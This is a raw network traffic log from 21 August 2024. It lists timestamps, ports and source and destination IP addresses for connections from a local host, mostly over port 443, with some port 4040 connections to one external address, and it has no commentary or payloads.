Aug 21, 2024 23:17:04.558010101 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.558011055 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:04.558021069 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.558036089 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.558053017 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:04.558082104 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:04.558090925 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.558104038 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.558142900 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:04.566212893 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:17:04.572580099 CEST	49748	443	192.168.2.4	13.107.246.64
Aug 21, 2024 23:17:04.572588921 CEST	443	49748	13.107.246.64	192.168.2.4
Aug 21, 2024 23:17:04.603821993 CEST	443	49745	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:04.604211092 CEST	49745	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:04.604218960 CEST	443	49745	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:04.604572058 CEST	443	49745	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:04.604913950 CEST	49745	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:04.604979992 CEST	443	49745	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:04.605185986 CEST	49745	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:04.613782883 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:17:04.648502111 CEST	443	49745	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:05.170702934 CEST	443	49745	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:05.170723915 CEST	443	49745	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:05.170782089 CEST	443	49745	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:05.170793056 CEST	49745	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:05.170830965 CEST	49745	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:05.171873093 CEST	49745	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:05.171883106 CEST	443	49745	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:05.216250896 CEST	49747	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:05.216403008 CEST	443	49747	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:05.216579914 CEST	49747	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:05.244898081 CEST	49749	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:17:05.244973898 CEST	443	49749	142.250.185.228	192.168.2.4
Aug 21, 2024 23:17:05.245058060 CEST	49749	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:17:05.256535053 CEST	49749	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:17:05.256571054 CEST	443	49749	142.250.185.228	192.168.2.4
Aug 21, 2024 23:17:05.257827044 CEST	49747	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:05.257837057 CEST	443	49747	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:05.270750999 CEST	49751	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:05.270773888 CEST	443	49751	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:05.270912886 CEST	49751	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:05.271286964 CEST	49751	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:05.271317005 CEST	443	49751	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:05.306490898 CEST	49747	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:05.314784050 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:05.314798117 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:05.314960957 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:05.315891027 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:05.315898895 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:05.332775116 CEST	49753	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:05.332803011 CEST	443	49753	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:05.332861900 CEST	49753	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:05.333074093 CEST	49753	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:05.333086967 CEST	443	49753	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:05.642788887 CEST	443	49747	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:05.642899036 CEST	443	49747	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:05.642951965 CEST	49747	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:05.643843889 CEST	49747	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:05.643851042 CEST	443	49747	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:05.757179976 CEST	443	49751	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:05.757560968 CEST	49751	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:05.757622957 CEST	443	49751	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:05.759305954 CEST	443	49751	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:05.759401083 CEST	49751	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:05.769326925 CEST	49751	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:05.769424915 CEST	443	49751	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:05.769515038 CEST	49751	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:05.787498951 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:05.787512064 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:05.787709951 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:05.788163900 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:05.788182020 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:05.816504002 CEST	443	49751	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:05.817965984 CEST	49751	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:05.817994118 CEST	443	49751	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:05.864806890 CEST	49751	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:05.916569948 CEST	443	49751	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:05.916647911 CEST	443	49751	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:05.916728973 CEST	49751	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:05.927984953 CEST	443	49749	142.250.185.228	192.168.2.4
Aug 21, 2024 23:17:05.934107065 CEST	49749	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:17:05.934139967 CEST	443	49749	142.250.185.228	192.168.2.4
Aug 21, 2024 23:17:05.935142040 CEST	443	49749	142.250.185.228	192.168.2.4
Aug 21, 2024 23:17:05.935225010 CEST	49749	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:17:05.941690922 CEST	49749	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:17:05.941946983 CEST	443	49749	142.250.185.228	192.168.2.4
Aug 21, 2024 23:17:05.946249962 CEST	49751	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:05.946293116 CEST	443	49751	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:05.950174093 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:17:05.956893921 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:17:05.989804029 CEST	49749	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:17:05.989824057 CEST	443	49749	142.250.185.228	192.168.2.4
Aug 21, 2024 23:17:06.036680937 CEST	49749	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:17:06.059207916 CEST	49755	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:06.059218884 CEST	443	49755	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:06.059418917 CEST	49755	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:06.062506914 CEST	49755	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:06.062521935 CEST	443	49755	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:06.121279955 CEST	49756	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:06.121288061 CEST	443	49756	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:06.121417999 CEST	49756	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:06.122458935 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:06.122508049 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:06.122713089 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:06.123104095 CEST	49756	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:06.123116016 CEST	443	49756	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:06.123429060 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:06.123459101 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:06.320842981 CEST	443	49753	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:06.322195053 CEST	49753	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:06.322212934 CEST	443	49753	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:06.323079109 CEST	443	49753	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:06.323137045 CEST	49753	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:06.323971033 CEST	49753	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:06.324021101 CEST	443	49753	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:06.324619055 CEST	49753	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:06.324624062 CEST	443	49753	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:06.364420891 CEST	49753	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:06.696204901 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:06.696683884 CEST	443	49756	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:06.699073076 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:06.699086905 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:06.699295044 CEST	49756	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:06.699302912 CEST	443	49756	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:06.699966908 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:06.700035095 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:06.700303078 CEST	443	49756	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:06.700356960 CEST	49756	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:06.705518007 CEST	49756	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:06.705590010 CEST	443	49756	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:06.706218004 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:06.706270933 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:06.706445932 CEST	49756	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:06.706459045 CEST	443	49756	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:06.706811905 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:06.706821918 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:06.711783886 CEST	443	49755	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:06.711843967 CEST	49755	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:06.716061115 CEST	49755	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:06.716064930 CEST	443	49755	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:06.716476917 CEST	443	49755	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:06.755017042 CEST	49756	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:06.755017042 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:06.766943932 CEST	49755	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:06.803997040 CEST	443	49753	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:06.804018021 CEST	443	49753	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:06.804024935 CEST	443	49753	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:06.804074049 CEST	443	49753	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:06.804081917 CEST	49753	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:06.804128885 CEST	49753	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:06.808501005 CEST	443	49755	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:06.810709953 CEST	49753	443	192.168.2.4	199.188.200.183
Aug 21, 2024 23:17:06.810720921 CEST	443	49753	199.188.200.183	192.168.2.4
Aug 21, 2024 23:17:06.847534895 CEST	443	49756	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:06.847594976 CEST	443	49756	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:06.847771883 CEST	49756	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:06.848232031 CEST	49756	443	192.168.2.4	172.67.74.152
Aug 21, 2024 23:17:06.848239899 CEST	443	49756	172.67.74.152	192.168.2.4
Aug 21, 2024 23:17:06.858741999 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:06.859052896 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:06.859091043 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:06.860569000 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:06.860631943 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:06.861156940 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:06.861248016 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:06.861346006 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:06.904524088 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:06.926907063 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:06.926924944 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:06.973752975 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:06.985949039 CEST	443	49755	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:06.986134052 CEST	443	49755	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:06.986192942 CEST	49755	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:07.270541906 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:07.270570040 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:07.270580053 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:07.270603895 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:07.270617962 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:07.270628929 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:07.270684004 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:07.270725012 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:07.270755053 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:07.272228956 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:07.272289991 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:07.285969019 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:07.285988092 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:07.285995960 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:07.286020041 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:07.286060095 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:07.286071062 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:07.286099911 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:07.286114931 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:07.287787914 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:07.287827969 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:07.289402008 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:07.373636007 CEST	49755	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:07.373644114 CEST	443	49755	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:07.525268078 CEST	49757	443	192.168.2.4	13.32.27.14
Aug 21, 2024 23:17:07.525301933 CEST	443	49757	13.32.27.14	192.168.2.4
Aug 21, 2024 23:17:07.527781010 CEST	49754	443	192.168.2.4	3.165.206.76
Aug 21, 2024 23:17:07.527792931 CEST	443	49754	3.165.206.76	192.168.2.4
Aug 21, 2024 23:17:07.614872932 CEST	49758	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:07.614887953 CEST	443	49758	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:07.615137100 CEST	49758	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:07.615787029 CEST	49758	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:07.615797997 CEST	443	49758	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:08.292026997 CEST	443	49758	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:08.292094946 CEST	49758	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:08.293488979 CEST	49758	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:08.293497086 CEST	443	49758	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:08.293854952 CEST	443	49758	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:08.295128107 CEST	49758	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:08.336503029 CEST	443	49758	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:08.576366901 CEST	443	49758	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:08.576437950 CEST	443	49758	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:08.576512098 CEST	49758	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:08.577224016 CEST	49758	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:08.577230930 CEST	443	49758	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:08.577241898 CEST	49758	443	192.168.2.4	184.28.90.27
Aug 21, 2024 23:17:08.577245951 CEST	443	49758	184.28.90.27	192.168.2.4
Aug 21, 2024 23:17:09.028348923 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.028590918 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:09.028600931 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.029509068 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.029735088 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:09.029959917 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:09.030018091 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.030069113 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:09.076493025 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.082997084 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:09.083003998 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.219566107 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.219578028 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.219614983 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.219623089 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.219625950 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.219647884 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:09.219660044 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.219671011 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.219686985 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:09.219697952 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.219722033 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:09.221349955 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:09.221354008 CEST	443	49752	13.107.246.42	192.168.2.4
Aug 21, 2024 23:17:09.221383095 CEST	49752	443	192.168.2.4	13.107.246.42
Aug 21, 2024 23:17:15.816546917 CEST	443	49749	142.250.185.228	192.168.2.4
Aug 21, 2024 23:17:15.816603899 CEST	443	49749	142.250.185.228	192.168.2.4
Aug 21, 2024 23:17:15.816673994 CEST	49749	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:17:15.954037905 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:15.954077005 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:15.954299927 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:15.955284119 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:15.955296040 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:16.560858965 CEST	49749	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:17:16.560909986 CEST	443	49749	142.250.185.228	192.168.2.4
Aug 21, 2024 23:17:16.933784962 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:16.933861971 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:16.937637091 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:16.937648058 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:16.937876940 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:16.989554882 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:17.849064112 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:17.892533064 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:18.107763052 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:18.107783079 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:18.107795000 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:18.107817888 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:18.107831001 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:18.107837915 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:18.107848883 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:18.107870102 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:18.107882023 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:18.107913017 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:18.108254910 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:18.108309984 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:18.108314991 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:18.108714104 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:18.108756065 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:18.723649025 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:18.723670959 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:18.723742962 CEST	49764	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:18.723748922 CEST	443	49764	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:50.959573984 CEST	49746	4040	192.168.2.4	185.174.100.20
Aug 21, 2024 23:17:50.964425087 CEST	4040	49746	185.174.100.20	192.168.2.4
Aug 21, 2024 23:17:55.443594933 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:55.443636894 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:55.443758011 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:55.444457054 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:55.444468975 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.228852987 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.228930950 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:56.235963106 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:56.235970974 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.236196041 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.254486084 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:56.300501108 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.569528103 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.569550037 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.569566011 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.569617033 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:56.569629908 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.569657087 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:56.569674969 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:56.571044922 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.571099043 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:56.571109056 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.571140051 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.571165085 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:56.571448088 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:17:56.571495056 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:56.579245090 CEST	49773	443	192.168.2.4	40.127.169.103
Aug 21, 2024 23:17:56.579256058 CEST	443	49773	40.127.169.103	192.168.2.4
Aug 21, 2024 23:18:05.282380104 CEST	49775	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:18:05.282439947 CEST	443	49775	142.250.185.228	192.168.2.4
Aug 21, 2024 23:18:05.282546997 CEST	49775	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:18:05.283387899 CEST	49775	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:18:05.283404112 CEST	443	49775	142.250.185.228	192.168.2.4
Aug 21, 2024 23:18:05.933154106 CEST	443	49775	142.250.185.228	192.168.2.4
Aug 21, 2024 23:18:05.951297045 CEST	49775	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:18:05.951337099 CEST	443	49775	142.250.185.228	192.168.2.4
Aug 21, 2024 23:18:05.951690912 CEST	443	49775	142.250.185.228	192.168.2.4
Aug 21, 2024 23:18:05.952163935 CEST	49775	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:18:05.952215910 CEST	443	49775	142.250.185.228	192.168.2.4
Aug 21, 2024 23:18:06.005435944 CEST	49775	443	192.168.2.4	142.250.185.228
Aug 21, 2024 23:18:10.911880016 CEST	49723	80	192.168.2.4	199.232.210.172
Aug 21, 2024 23:18:10.911976099 CEST	49724	80	192.168.2.4	199.232.210.172
Aug 21, 2024 23:18:10.918556929 CEST	80	49723	199.232.210.172	192.168.2.4
Aug 21, 2024 23:18:10.918832064 CEST	49723	80	192.168.2.4	199.232.210.172
Aug 21, 2024 23:18:10.919001102 CEST	80	49724	199.232.210.172	192.168.2.4
Aug 21, 2024 23:18:10.919833899 CEST	49724	80	192.168.2.4	199.232.210.172
Aug 21, 2024 23:18:15.849452972 CEST	443	49775	142.250.185.228	192.168.2.4
Aug 21, 2024 23:18:15.849507093 CEST	443	49775	142.250.185.228	192.168.2.4
Aug 21, 2024 23:18:15.849639893 CEST	49775	443	192.168.2.4	142.250.185.228
